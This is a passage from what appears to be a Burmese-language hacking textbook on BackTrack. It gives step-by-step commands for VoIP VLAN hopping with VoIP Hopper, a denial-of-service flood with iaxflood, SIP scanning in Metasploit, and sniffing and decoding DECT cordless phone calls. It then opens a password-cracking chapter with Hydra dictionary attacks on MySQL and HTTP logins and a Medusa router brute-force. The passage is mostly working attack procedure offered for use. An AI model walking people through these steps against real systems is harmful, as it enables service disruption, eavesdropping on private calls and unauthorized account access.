ယခုအပိုင္းတြင္ VoIP Hopper ကို ဖြင့္ျခင္းျဖင့္ စတင္ရပါမည္။

၁။ Termianl Window ကိုဖြင့္ၿပီး voiphopper ဟူေသာ Command ကိုအသံုးျပဳရပါမည္။ ၄င္း Command


သည္ VoIP Hopper Help ဖိုင္ကို Load ျပဳလုပ္ႏိုင္ပါသည္။

voiphopper

244 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္းပင္ VoIP Hopper တြင္အသံုးျပဳႏိုင္ေသာ Option အမ်ားအျပား


ပါရိွပါသည္။

 -i : ထို Option သည္ Interface ကိုေရြးခ်ယ္ရန္အတြက္ အသံုးျပဳရပါသည္။


 -c : ထို Option သည္ Capability မ်ားကိုေရြးခ်ယ္ရန္ အသံုးျပဳႏိုင္ပါသည္။
 -S : ထို Option သည္ အသံုးျပဳလိုေသာ Software ကို ေရြးခ်ယ္ရန္အတြက္ အသံုးျပဳႏိုင္
ပါသည္။
အားလံုးကို ၿခံဳငံု၍ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

voiphopper –I eth0 –c 2

မ်က္ပြင့္စာေပ 245
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Causing a denial of Service


ယခုအပိုင္းတြင္ Iaxflood ကိုအသံုးျပဳ၍ Target SIP device တြင္ denial of service attack ျပဳလုပ္ျခင္းကို
ေလ့လာၾကည္႕ၾကပါမည္။ Denial-of-service attack သည္ (LAN သိ႕ု မဟုတ္ WLAN) Network ကိုျဖတ္
သန္း၍ မ်ားျပားလွေသာ Traffic မ်ားကို ပိ႕ု လႊတ္လိုက္ျခင္းျဖင့္ အျခားအသံုးျပဳသူမ်ား အသံုးမျပဳႏုိင္ေစရန္
လုပ္ေဆာင္လိုက္ေသာ လုပ္ေဆာင္ခ်က္တစ္ခုျဖစ္ပါသည္။ ယခုအပိုင္းတြင္ Asterisk PBX system
ေပၚတြင္ ထို Attack ကိုလုပ္ေဆာင္ႏိုင္ရန္ laxflood ကိုအသံုးျပဳၾကည္႕ပါမည္။ ထိုနည္းတူစြာပင္
Inviteflood ကို Target တစ္ခုကို Flood ျပဳလုပ္ရန္အတြက္ Invite Request မ်ားကို လက္မခံေလာက္ေစ
သည္အထိ ပို႕လႊတ္ကာ အားလံုးေသာ Traffic မ်ားကို ျငင္းပယ္ေစသည္အထိ ျပဳလုပ္ေပးႏိုင္ပါသည္။

ယခုအပိုင္းျပဳလုပ္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခု


 SIP သိ႕ု မဟုတ္ PBX Device မ်ားကို လုိအပ္ပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီး Iaxflood ပါ၀င္ေသာ Folder သို႕လမ္းေၾကာင္းေျပာင္းေပးရပါမည္။

cd /pentest/voip/iaxflood

၂။ Iaxflood ကိုအသံုးျပဳရမည္႕ ပံုစံမွာ ./iaxflood [source IP] [Destination IP] [Number of Packets]
ျဖစ္ေသာေၾကာင့္ သန္းခ်ီေသာ Packet မ်ားကို Target Ip ကို ပိ႕ု လႊတ္ေပးရန္အတြက္ ေအာက္ပါအတိုင္း
အသံုးျပဳရပါမည္။

/iaxflood 192.168.56.100 192.168.56.110 1000000

ယခုအပိုင္းတြင္ Iaxflood ကိုအသံုးျပဳ၍ Network ၏ Target ေပၚတြင္ Denial of Service Attack ကို
ျဖစ္ေစရန္အတြက္ ျပဳလုပ္ျခင္းကိုေဖာ္ျပေပးခဲ့သည္။ ယခုအပိုင္းတြင္ Iaxflood ရိွေသာ Directory
လမ္းေၾကာင္းကို navigate ျပဳလုပ္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး Target Device သိ႕ု 1 million ခန္႕ရိွေသာ Packet
မ်ားကို ပို႕လႊတ္ကာ DoS attack ကိုလုပ္ေဆာင္ျခင္းကို ေဖာ္ျပခဲ့ပါသည္။

246 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Attacking VoIP using Metasploit


ယခုအပိုင္းတြင္ VoIP Network တစ္ခုကို တိုက္ခိုက္ရန္အတြက္ Metasploit ကိုအသံုးျပဳၾကည္႕ပါမည္။
Metasploit တြင္ VoIP Network ကိုထိုးေဖာက္ရန္အတြက္ Auxiliarie ႏွင့္ Module မ်ားအမ်ားအျပားပါ
ရိွပါသည္။ Metasploit သည္ BackTrack 5 တြင္ပါ၀င္ေသာ Peneration testing framework တစ္ခုလည္း
ျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ Metasploit ကိုအသံုးျပဳပံုကို Chapter 5, Exploitation တြင္အေသးစိပ္အသံုးျပဳ
ႏိုင္ပါသည္။

ယခုအပိုင္းကိုေအာင္ျမင္စြာလုပ္ေဆာင္ႏိုင္ေစရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection


 SIP သိ႕ု မဟုတ္ PBX device မ်ားကိုလုိအပ္မည္ျဖစ္သည္။

၁။ Terminal Window ကိုဖြင့္၍ MSFCONSOLE ကိုစတင္ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

msfconsole

၂။ SIP module မ်ားကို ရွာေဖြရန္အတြက္

search SIP

ေအာက္တြင္ေဖာ္ျပထားသည္႕ပံုအတိုင္းပင္ မ်ားစြာေသာ ေရြးခ်ယ္စရာမ်ားကိုေတြ႕ျမင္ရမည္ျဖစ္သည္။

မ်က္ပြင့္စာေပ 247
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ SIP Scanner module ကိုအသံုးျပဳရန္အတြက္

use auxiliary/scanner/sip/options

၄။ ထို႕ေနာက္ Module အတြက္ Option မ်ားကို ၾကည္႕ရွဳၾကပါမည္။

၅။ ေနာက္ဆံုးတြင္ RHOSTS Option ကုိ Setting ခ်ျခင္းျဖင့္ Target IP Range ကိုသတ္မွတ္ေပးရန္


လိုအပ္ပါမည္။

set RHOSTS 192.168.56.100/24

၆။ ထို႕ေနာက္ ရိုးရွင္းစြာ ေအာက္တြင္ျပထားေသာ Command အတိုင္း payload ကိုေမာင္းႏွင္ႏိုင္ပါသည္။

run

ယခုအပိုင္းတြင္ Network မွ SIP Device မ်ားကို Scan လုပ္ရန္ႏွင့္ Identify ျပဳလုပ္ရန္အတြက္ Metasploit
ကိုအသံုးျပဳခဲ့ပါသည္။ ေတြ႕ျမင္ရသည္႕အတိုင္းပင္ Username grabbing မွ Authentication Capture
မ်ားအထိ Module မ်ား၏ Range သည္အလြန္မ်ားျပားေၾကာင္း ေတြ႕ရမည္ျဖစ္သည္။ Scanner Module
ကို လုပ္ေဆာင္ေသာအခါတြင္ တည္ရိွၿပီးျဖစ္သည္႕ Host မ်ား၏ List ကိုရရိွပါမည္။ ၄င္းသည္
ေနာက္တစ္ခ်ိန္တြင္ Attack ျပဳလုပ္ရန္ႏွင့္ Exploit မ်ားကို လုပ္ေဆာင္ရန္အတြက္ User မ်ား၏ စာရင္းကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။

248 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Sniffing DECT phones


ယခုအပိုင္းတြင္ deDECTed ကိုအသံုးျပဳ၍ Digital Enhanced Cordless Telecommunications (DECT)
ဖုန္းမ်ားေပၚမွ Traffic မ်ား Sniff (ဖမ္းယူျခင္း) ကိုလုပ္ေဆာင္ၾကည္႕ၾကပါမည္။ DECT ဆိုသည္မွာ
Cordless ဖုန္းမ်ားတြင္အသံုးျပဳေသာနည္းပညာတစ္ခုျဖစ္သည္။ ၄င္းအမ်ိဳးအစားဖုန္းမ်ားသည္ VoIP ကို
အသံုးျပဳေသာ စီးပြားေရးလုပ္ငန္းသံုး ဖုန္းစနစ္မ်ားတြင္ ေရပန္းစားမႈျမင့္တက္လာပါသည္။ DeDECTed
သည္ Cordless ဖုန္းမွ ေခၚဆိုေသာ Phone Call မ်ားကို ဖမ္းယူျခင္း (Sniff) သာမက၊ ျပန္လည္နားေထာင္
ျခင္း (Decode) ျပဳလုပ္ျခင္းတို႕ကိုပါ လုပ္ေဆာင္ႏိုင္ေစပါသည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခု


 Network တြင္အသံုးျပဳႏိုင္ရန္ SIP သို႕မဟုတ္ PBX device မ်ား
 PCMCIA card ႏွင့္ ကိုက္ညီေသာ DOSCH&AMAND စသည္တို႕ကို အသံုးျပဳ၍ လုပ္
ေဆာင္ေပးရပါမည္။

DECT ဖုန္းမ်ားကို Sniffing ျပဳလုပ္ျခင္းလုပ္ငန္းစဥ္ကို စတင္ရန္အတြက္ deDECTed ကို Install


ျပဳလုပ္ေပးရပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီး deDECTed ကို Install ျပဳလုပ္ရန္ ေအာက္ပါ Command မ်ားကို
အသံုးျပဳပါ။

apt-get update

apt-get install detected

၂။ Audacity ကို Install ျပဳလုပ္ရပါမည္။ Audacity သည္ Audio ကို တည္းျဖတ္ Mixing ျပဳလုပ္ႏိုင္ေသာ
Open Source တစ္ခုျဖစ္ပါသည္။

apt-get –y install audacity

မ်က္ပြင့္စာေပ 249
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Termianl window တစ္ခုဖြင့္၍ deDECTed ရိွသည္႕ Folder လမ္းေၾကာင္းကို Navigate ျပဳလုပ္ေပးရပါ


မည္။

cd /pentest/telephony/dedected

၄။ ထိ႕ု ေနာက္ ေအာက္ပါ Command မ်ားကိုလုပ္ေဆာင္ျခင္းျဖင့္ လိုအပ္ေသာ Driver မ်ားကို Load ျပဳလုပ္
ေပးရပါမည္။

cd /pentest/telephony/dedected/com-on-air_cs-linux

make node

make load

၅။ ထို႕ေနာက္ deDECTed ကိုအသံုးျပဳႏိုင္ၿပီျဖစ္သည္။ /pentest/telephony/dedected/com-on-air_cs-


linux directory လမ္းေၾကာင္းထဲတြင္ ရိွေနစဥ္အတြင္းတြင္ ေအာက္ပါ Command ကိုစတင္အသံုးျပဳရပါ
မည္။

./dect_cli

၆။ ထို႕ေနာက္ Callscan တစ္ခုကို Execute ျပဳလုပ္ပါ။

callscan

၇။ ထို႕ေနာက္ Detect ေတြ႕ရိွသမွ်ေသာ Phone Call တိုင္းကို Record ျပဳလုပ္ရန္ autorec ကိုအသံုးျပဳပါ။

autorec

၈။ Phone call မ်ားရရိွလွ်င္ ၄င္း Stream မ်ားကို ေအာက္ပါ Command ျဖင့္ Decode ျပဳလုပ္ႏိုင္ပါသည္။

./decode.sh

၉။ ထို႕ေနာက္ ထို Phone Call မ်ားကို Audacity ကို ထည္႕သြင္းေပးရပါမည္။ Application Launcher ကို
ေခၚယူရန္အတြက္ Alt + F2 ကိုတႏ
ြဲ ိွပ္ပါ။ Launcher ထဲတြင္ audacity ဟုရိုက္ထည္႕ၿပီး Run ခလုတ္ကို
Click ႏိွပ္ေပးရပါမည္။

250 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ File မ်ားကိုထည္႕သြင္းရန္အတြက္ File> Import> Audio… ကိုေရြးခ်ယ္ပါ။

၁၁။ ထို႕ေနာက္ .wav ဖိုင္ျပဳလုပ္မည္႕လမ္းေၾကာင္းကို Navigate ျပဳလုပ္ၿပီး Call မ်ားထဲမွ နားေထာင္


လိုေသာ file တစ္ခုကိုေရြးခ်ယ္ေပးရပါမည္။

၁၂။ ေနာက္ဆံုးတြင္ Clean up ျပဳလုပ္ရမည္႕ အဆင့္မ်ားကို လုပ္ေဆာင္ေပးရပါမည္။ ထို႕ေၾကာင့္ Terminal


Windowရိွရာသို႕ျပန္သြားကာ/pentest/telephony/detected/com-on-air_cs-linux ဟူေသာ Directory
သို႕သြားေရာက္၍ ေအာက္ပါ Command မ်ားကို execute ျပဳလုပ္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 251
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Make unload

Rm /dev/coa

ယခုအပိုင္းတြင္ DECT Phone မ်ားမွ Traffic ကို ဖမ္းယူရန္ deDECTed အသံုးျပဳပံုကိုေဖာ္ျပခဲ့ပါသည္။


ထို႕ေနာက္ deDECTed ႏွင့္ Audacity Tool မ်ားကို Install ျပဳလုပ္ေပးခဲ့ကာ deDECTed အတြက္
လုိအပ္ေသာ Driver မ်ားကို Load လုပ္ျခင္းတို႕ကို ျပဳလုပ္ခဲ့ပါသည္။ ထို႕ေနာက္ deDECTed ကိုစတင္ခဲ့ၿပီး
Call မ်ားကို ဖမ္းယူရန္အတြက္ Network ကိုစစ္ေဆးဲ့ၾကပါသည္။ ထို႕ေနာက္ Call မ်ားကို Record
ျပဳလုပ္ရန္ autorec Command ကိုအသံုးျပဳခဲ့ပါသည္။ ထို႕ေနာက္ Call မ်ားကို Decode ျပဳလုပ္ရန္
လိုအပ္သည္႕အတြက္ Audacity ကိုအသံုးျပဳ၍ လုပ္ေဆာင္ျခင္းတို႕ကိလ
ု ည္း ေဖာ္ျပခဲ့ပါသည္။






252 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 9

Password Cracking
Password မ်ားကိုထိုးေဖာက္ခိုးယူျခင္း

မ်က္ပြင့္စာေပ 253
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
ယခုအခန္းတြင္ User Account မ်ားကို ၀င္ေရာက္ႏိုင္ရန္အတြက္ Password မ်ားကို Crack လုပ္ျခင္း၏
နည္းလမ္းေပါင္းစံုကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Password မ်ားကို Crack ျပဳလုပ္ျခင္းသည္ ထုိးေဖာက္မႈကို
စမ္းသပ္သူမ်ားအတြက္ အလုပ္တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။ ပင္ကိုအားျဖင့္ System တိုင္းအတြက္
မလံုၿခံဳဆံုးေသာအစိတ္အပိုင္းသည္ User မ်ားမွ Password မ်ားကိုရိုက္ထည္႕သည္႕ ေနရာဟုလည္း
ဆိုႏိုင္ပါသည္။ အေၾကာင္းမွာ မ်ားစြာေသာလူမ်ားသည္ ပင္ကိုအားျဖင့္ Strong ျဖစ္ေစသည္႕ Password
မ်ားေပးျခင္းကိုမႏွစ္သက္ဘဲေမ့ေလွ်ာ့ေသာအခါတြင္ Reset ျပဳလုပ္ရျခင္းကိုလည္း မုန္းတီးၾကေလ့ရိွသည္။
ထိုအခ်က္သည္ပင္ Hacker မ်ားအတြက္ လြယ္ကူေသာ Target မ်ားျဖစ္လာေစပါသည္။ ယခု Password
cracking အခန္းတြင္ ေလ့လာရမည္႕ က႑မ်ားမွာ

 Online Password attacks


 Cracking HTTP passwords
 Gaining Router Access
 Password Profiling
 Cracking a Windows password using John the Ripper
 Using Dictionary attacks
 Using rainbow tables
 Using NVIDIA Compute Unified Device Architecture (CUDA)
 Using ATI Stream
 Pysical Access attacks တို႕ျဖစ္ၾကပါသည္။ ထို႕ေၾကာင့္ ပထမဆံုးအပိုင္းျဖစ္ေသာ
Online Password Cracking ကိုစတင္ေလ့လာၾကည္႕ၾကပါမည္။

254 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Online Password attacks


ယခုအပိုင္းတြင္ THC-Hydra(Hydra) Password Cracker ကုိအသံုးျပဳၾကည္႕ၾကပါမည္။ ၄င္းကို Windows
တင္ထားေသာ ကြန္ပ်ဴတာမ်ားကို Physicially attack ျပဳလုပ္ၿပီး Security Accounts Manager (SAM)
ဖိုင္ကို တိုက္ရိုက္ရယူျခင္း လုပ္ေဆာင္ခ်က္ျဖစ္သည္။ သိ႕ု ေသာ္ အခါခပ္သိမ္း မလုပ္ေဆာင္ႏိုင္ေၾကာင္းကို
သိရိွထားရပါမည္။

Hydra သည္ မ်ားစြာေသာ Protocol မ်ားကို အေထာက္အပံ့ေပးပါသည္။ ထို Protocol မ်ားမွာ FTP, HTTP,
HTTPS, MySQL, MSSQL, Oracle, Cisco, IMAP, VNC ႏွင့္အျခားေသာ Protocol မ်ားျဖစ္သည္။
သတိထားရန္အခ်က္မွာ Hydra ကိုအသံုးျပဳျခင္းျဖင့္ Attack ျပဳလုပ္ခံရသူမ်ားကို သိသာေစပါသည္။

စတင္အသံုးျပဳရန္အတြက္ Internet လိုင္းႏွင့္ အသံုးျပဳသူသံုးသကဲ့သို႕အသံုးျပဳႏိုင္ရန္ ကြန္ပ်ဴတာတစ္စံု


လုိအပ္မည္ျဖစ္သည္။ စတင္ရန္အတြက္ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ေဖာ္ျပေပးမည္ျဖစ္သည္။

၁။ Online Password Cracking ျပဳလုပ္ျခင္းကို စတင္ရန္အတြက္ Desktop ၏ Start Menu မွ


Applications> BackTrack> Privilege Escalation> Password Attacks> Online Attacks> hydra-gtk
တို႕ကိုအဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 255
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Hydra ကိုစတင္ၿပီးေသာအခါ Wordlist မ်ားကိုေရြးခ်ယ္သတ္မွတ္ေပးရန္လိုအပ္မည္ျဖစ္သည္။


Password Tab တြင္ Click ႏိွပ္ပါ။ Username list ႏွင့္ Password list ကိုအသံုးျပဳမည္ျဖစ္သည္။ ထို႕
ေၾကာင့္ Username ႏွင့္ Password list ၏ location ကိုေရြးခ်ယ္ေပးရပါမည္။ ေအာက္တြင္ေဖာ္ျပထား
ပါသည္။

 Username List : /pentest/web/wfuzz/worlist/fuzzdb/wordlists-user-passwd/


names/nameslist.txt
 Password List : /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-
passwd/passwds/john.txt

မွတ္ရန္။ ။လြယ္ကူေစသည္႕ နည္းလမ္းမွာ Wordlist box အတြင္းတြင္ Click ႏိွပ္ျခင္းျဖင့္


filesystem window ေပၚလာမည္ျဖစ္ၿပီး ထိုအထဲမွ ေရြးခ်ယ္ျခင္းျဖစ္ပါသည္။

ထို႕ေနာက္ Loop around users ႏွင့္ Try empty password ဟူေသာ Option ႏွစ္ခုကို ေရြးခ်ယ္ေပးထား
ရပါမည္။

256 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ Tuning Tab ကိုေရြးခ်ယ္ပါ။ Performance Options ေအာက္မွ Number of Tasks တြင္ 16
ကို 2 ဟုေရြးခ်ယ္ပါမည္။ ထိုသို႕ျပဳလုပ္ရျခင္းမွာ Process မ်ားျပားစြာ တစ္ခ်ိန္တည္းတြင္ ေမာင္းႏွင္မိ
ျခင္းသည္ Server ကို ေႏွးေကြးေစမည္႕အတြက္ေၾကာင့္ ျဖစ္ပါည္။ ထို႕ေနာက္ Exit after first found pair
Option ကိုလည္းေရြးခ်ယ္ေပးထားသင့္ပါသည္။

၄။ ထို႕ေနာက္ Target Tab ကိုေရြးခ်ယ္ပါမည္။ Target ကိုေရြးခ်ယ္ေပးရပါမည္။ ထိ႕ု ေနာက္ Attack


ျပဳလုပ္မည္႕ Protocol ကိုလည္း ေရြးခ်ယ္ေပးရပါမည္။ ယခုေနရာတြင္ MySQL Port ကိုေရြးခ်ယ္ ထားၿပီး
Target အားျဖင့္ 192.168.10.111 ကိုေရြးခ်ယ္ထားရပါမည္။

မ်က္ပြင့္စာေပ 257
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ေနာက္ဆံုးအဆင့္အရ Start Tab ကိုေရြးခ်ယ္ၿပီးေနာက္ Exploit ကို စတင္ရန္အတြက္ Start ခလုတ္ကို


Click တစ္ခ်က္ႏိွပ္ပါ။ ေအာက္တြင္ပံုႏွင့္တကြေဖာ္ျပထားပါသည္။

258 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ထို႕ေနာက္အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕ပါမည္။ Target ကို Attack ျပဳလုပ္ရန္ Dictionary Attack


ျဖင့္ တိုက္ခိုက္ျခင္းျဖစ္ၿပီး Software ကိုမူ Hydra ကိုအသံုးျပဳခဲ့ပါသည္။ Hydra သည္ သတ္မွတ္ထားေသာ
Target မွ Username ႏွင့္ Password မ်ားကို List ျဖင့္ တိုက္ဆိုင္စစ္ေဆးျခင္း ျဖစ္သည္႕အတြက္ Brute
force ကိုအသံုးျပဳျခင္းဟူ၍လည္းဆိုႏိုင္ပါသည္။ အေၾကာင္းမွာ ျဖစ္ႏိုင္ဖြယ္ရာ စကားလံုးမ်ားကို
ေပါင္းစပ္တိုက္ဆိုင္စစ္ေဆးျခင္းျဖင့္ Username မ်ားႏွင့္ Password မ်ားကို ရွာေဖြသည္႕အတြက္ေၾကာင့္
ျဖစ္ပါသည္။

Cracking HTTP passwords


ယခုအပိုင္းတြင္ THC-Hydra (Hydra) Password Cracker ကိုအသံုးျပဳ၍ HTTP Password မ်ားကို Crack
ျပဳလုပ္ျခင္းတို႕ကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Website မ်ားကို၀င္ေရာက္ျခင္း သိ႕ု မဟုတ္ Web Application
မ်ားသည္ မ်ားေသာအားျဖင့္ Username မ်ားႏွင့္ Password မ်ားတို႕၏ ေပါင္းစပ္ျခင္း တို႕ႏွင့္ ထိန္းခ်ဳပ္
ထားျခင္းျဖစ္သည္။ သို႕ရာတြင္မ်ားေသာအားျဖင့္လံုၿခံဳေရးကိုအားနည္းေစမည္ ႕ Password မ်ားကို အေပး
မ်ားျခင္းသည္ Cracking လုပ္ယူေစမည္႕ Hacker မ်ားအတြက္မဟာအခြင့္အေရးတစ္ရပ္လည္း ျဖစ္လာ
တတ္ပါသည္။ ထိ႕ု ေၾကာင့္ HTTP Password Cracking ကိုအဆင့္အလိုက္ စတင္ေလ့လာ ၾကည္႕ၾကပါ
မည္။

၁။ Strart Menu မွ Applications> BackTrack> Privilege Escalation> Password Attacks> Online


Attacks> hydra-gtk တို႔ကိုအဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 259
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ထိုအခါ Hydra ကိုစတင္ၿပီးျဖစ္သည္႕အတြက္ Wordlist မ်ားကိုေရြးခ်ယ္သတ္မွတ္ေပးရန္ လိုအပ္မည္


ျဖစ္ပါသည္။ Password Tab ကို Click ႏိွပ္ၿပီးေနာက္ Username List ႏွင့္ Password list တို႕ကို အသံုးျပဳ
ရပါမည္။ Username list ႏွင့္ Password List တိ႕ု ၏ တည္ေနရာကိုေအာက္တြင္ေဖာ္ျပထားပါသည္။ ထို
List မ်ားကို ထိုေနရာသို႕သြားေရာက္ေရြးခ်ယ္ေပးရပါမည္။

 Username List: /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/


names/nameslist.txt
 Password List: /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/
passwds/john.txt

မွတ္ရန္။ ။အထက္တြင္ေဖာ္ျပထားေသာ လမ္းေၾကာင္းမ်ားကို ေရြးခ်ယ္ရန္အတြက္ လြယ္ကူေသာ


နည္းလမ္းမွာ Word List Box တြင္ Click ျပဳလုပ္၍ ေပၚလာေသာ Filesystem window တြင္ ေရြးခ်ယ္
ျခင္းျဖစ္ပါသည္။

ထို႕အျပင္ Loop around users ႏွင့္ Try empty password option တို႕ကိုလည္းေရြးခ်ယ္ေပးထားရပါ မည္။
260 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထိ႕ု ေနာက္ Tuning Tab ကိုေရြးခ်ယ္ပါ။ Performance Options ေအာက္မွ Number of tasks တြင္ 16
မွ 2 သို႕ေျပာင္းလဲေပးထားရပါမည္။ အေၾကာင္းမွာ လုပ္ေဆာင္ခ်က္မ်ား မ်ားျပားလြန္းျခင္းသည္ Server ၏
အရည္အေသြးကို က်ဆင္းေစျခင္းေၾကာင့္ျဖစ္ပါသည္။ လုပ္ေဆာင္စရာမလိုေသာ္လည္း လုပ္ေဆာင္ထား
သင့္ေသာအခ်က္တစ္ခုမွာ Exit after first found pair option ကိုေရြးခ်ယ္ေပးထားရန္ပင္ ျဖစ္ပါသည္။

မ်က္ပြင့္စာေပ 261
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ေနာက္ဆံုးအဆင့္အေနျဖင့္ Target ကိုေရြးခ်ယ္ေပးႏိုင္ရန္အတြက္ Target Tab တြင္ click ႏိွပ္ပါ။


ထို႕ေနာက္ Target ႏွင့္ Protocol တိ႕ု ကိုေရြးခ်ယ္ေပးထားရပါမည္။ ယခုအေနအထားအရ Protocol တြင္
HTTP port ကိုေရြးခ်ယ္ၿပီး Target တြင္နမူနာအားျဖင့္ 192.168.10.111 ကိုေရြးခ်ယ္ထားပါသည္။

262 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ထို႕ေနာက္စတင္ရန္သာလိုအပ္ပါေတာ့သည္။ ထုိသို႕စတင္ရန္အတြက္ Start Tab တြင္ Click ႏိွပ္ေရြး


ခ်ယ္ၿပီးေနာက္ Start ခလုတ္တြင္ ထပ္မံ Click တစ္ခ်က္ႏိွပ္၍ စတင္ေပးရပါမည္။

Gaining router access


ယေန႕ကာလတြင္ မ်ားစြာေသာလူတို႕သည္ ကြန္ယက္ယဥ္ေက်းမႈတြင္ေနထိုင္ရျခင္းျဖစ္ပါသည္။ Network
ခ်ိတ္ထားေသာ Video Game မ်ား၊ ကြန္ပ်ဴတာမ်ားစြာပါ၀င္ေသာ အိမ္တြင္းကြန္ယက္မ်ား သို႕မဟုတ္
အေသးစားစီးပြားေရးလုပ္ငန္းမ်ား စေသာေနရာမ်ားသည္ ပိုမိုတိုးပြားစြာရွင္သန္လာလ်က္ရိွပါသည္။ ထိုအခါ
Router မ်ားသည္လည္း Network Communication တြင္ေတြ႕ျမင္ေနက် ပစၥည္းတစ္ခုအျဖစ္ ပါ၀င္လာရပါ
သည္။ ယခုအပိုင္းတြင္ ထို Router မ်ားသို႕၀င္ေရာက္ခြင့္ရရန္အတြက္ Attack မ်ားကို ေလ့လာ ၾကရပါမည္။
Medusa ကိုအသံုးျပဳ၍ Router မ်ားကို Brute-force Attack ျဖင့္ တိုက္ခိုက္ျခင္းကို ေလ့လာ ၾကည္႕ၾက
ပါမည္။ ယခုအပုိင္းကိုေလ့လာရန္အတြက္ Internet အသံုးျပဳျခင္းႏွင့္ Router တစ္လံုးကိုလိုအပ္မည္ျဖစ္ပါ
သည္။ ထိ႕ု ေနာက္ အဆင့္အလိုက္လုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။

မ်က္ပြင့္စာေပ 263
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ Start Menu မွ Applications> BackTrack> Privilege Escalation> Password Attacks> Online


Attacks> medusa သိ႕ု အဆင့္အဆင့္ေရြးခ်ယ္ေပးရပါမည္။ Medusa ကိုစတင္လာေသာအခါ Help ဖိုင္ ကို
ဦးစြာေဖာ္ျပမည္ျဖစ္သည္။ ေအာက္ပါပံုအတိုင္းေတြ႕ျမင္ႏိုင္ပါလိမ့္မည္။

